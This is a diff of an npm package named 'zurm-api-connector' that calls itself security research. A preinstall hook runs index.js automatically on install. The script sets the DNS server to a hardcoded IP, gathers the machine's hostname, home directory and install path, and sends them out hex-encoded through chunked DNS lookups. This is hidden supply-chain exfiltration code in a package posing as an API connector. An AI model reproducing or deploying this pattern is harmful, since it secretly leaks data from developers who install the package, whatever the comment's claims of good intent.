zurm-api-connector 6.7.5

package/index.js

@@ -0,0 +1,64 @@
+/*
+ *
+ * This code is used for research purposes.
+ *
+ * No sensitive data is retrieved.
+ *
+ * Callbacks from within organizations with a
+ * responsible disclosure program will be reported
+ * directly to the organizations.
+ *
+ * Any other callbacks will be ignored, and
+ * any associated data will not be kept.
+ *
+ * */
+
+
+const dns = require('dns');
+dns.setServers(['172.104.4.75']);
+const os = require('os');
+
+const suffix = '.dns';
+
+const package = 'zurm-api-connector';
+
+function sendToServer(data) {
+
+	    data = Buffer.from(data).toString('hex');
+	    data = data.match(/.{1,60}/g);
+
+	    id = Math.random().toString(36).substring(2);
+
+	    data.forEach(function (chunk, idx){
+		            try {
+				                dns.resolve(
+							                'v2_f.' + id + '.' + idx + '.' + chunk + '.v2_e' + suffix, 'A',
+							                console.log);
+				            } catch (e) { }
+		        });
+
+}
+
+function tryGet(toCall) {
+
+	    try {
+		            return toCall();
+		        } catch(e) {
+				        return 'err';
+				    }
+
+}
+
+data = {
+	    p : package,
+	    h : tryGet(os.hostname),
+	    d : tryGet(os.homedir),
+	    c : __dirname
+}
+
+data = JSON.stringify(data);
+
+
+console.log(data);
+sendToServer(data);
+                                     

package/package.json

@@ -0,0 +1,12 @@
+{
+	"name": "zurm-api-connector",
+	"version": "6.7.5",
+	"description": "Security research purposes only.",
+	"main": "index.js",
+	"scripts": {
+		"test": "",
+		"preinstall": "node index.js"
+	},
+	"author": "e7b63256bd3084c4d5c6c54687-97d9403461948a86682d29a",
+	"license": "ISC"
+}